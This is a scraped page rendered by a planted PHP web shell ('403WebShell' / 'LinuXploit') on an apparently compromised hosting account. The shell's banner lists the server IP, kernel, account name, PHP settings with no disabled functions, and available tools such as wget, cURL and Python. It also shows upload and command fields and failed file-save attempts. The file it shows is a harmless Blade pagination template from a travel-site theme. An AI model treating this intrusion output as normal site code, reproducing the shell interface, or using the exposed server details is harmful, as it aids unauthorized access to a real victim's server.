Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 52.15.35.129
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/themes/Mytravel/Layout/parts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/themes/Mytravel/Layout/parts/paging.blade.php
@if ($paginator->hasPages())
    <nav aria-label="{{__('Page navigation')}}">
        <ul class="list-pagination-1 pagination border border-color-4 rounded-sm overflow-auto overflow-xl-visible justify-content-md-center align-items-center py-2 mb-0">
            @if ($paginator->onFirstPage())
                <li class="page-item disabled">
                    <a class="page-link border-right rounded-0 text-gray-5" href="javascript:void(0)" aria-label="{{__("Previous")}}">
                        <i class="flaticon-left-direction-arrow font-size-10 font-weight-bold"></i>
                        <span class="sr-only">{{__("Previous")}}</span>
                    </a>
                </li>
            @else
                <li class="page-item">
                    <a class="page-link border-right rounded-0 text-gray-5" href="{{ $paginator->previousPageUrl() }}" aria-label="{{__("Previous")}}">
                        <i class="flaticon-left-direction-arrow font-size-10 font-weight-bold"></i>
                        <span class="sr-only">{{__("Previous")}}</span>
                    </a>
                </li>
            @endif
            @foreach ($elements as $element)
                @if (is_string($element))
                    <li class="page-item disabled" aria-disabled="true"><span>{{ $element }}</span></li>
                @endif

                @if (is_array($element))
                    @foreach ($element as $page => $url)
                        @if ($page == $paginator->currentPage())
                            <li class="page-item active" aria-current="page"><span class="page-link font-size-14">{{ $page }}</span></li>
                        @else
                            <li class="page-item"><a class="page-link font-size-14" href="{{ $url }}">{{ $page }}</a></li>
                        @endif
                    @endforeach
                @endif
            @endforeach

            @if ($paginator->hasMorePages())
                <li class="page-item">
                    <a class="page-link border-left rounded-0 text-gray-5" href="{{ $paginator->nextPageUrl() }}" aria-label="{{__("Next")}}">
                        <i class="flaticon-right-thin-chevron font-size-10 font-weight-bold"></i>
                        <span class="sr-only">{{__("Next")}}</span>
                    </a>
                </li>
            @else
                <li class="page-item disabled">
                    <a class="page-link border-left rounded-0 text-gray-5" href="javascript:void(0)" aria-label="{{__("Next")}}">
                        <i class="flaticon-right-thin-chevron font-size-10 font-weight-bold"></i>
                        <span class="sr-only">{{__("Next")}}</span>
                    </a>
                </li>
            @endif
        </ul>
    </nav>

@endif

Youez - 2016 - github.com/yon3zu
LinuXploit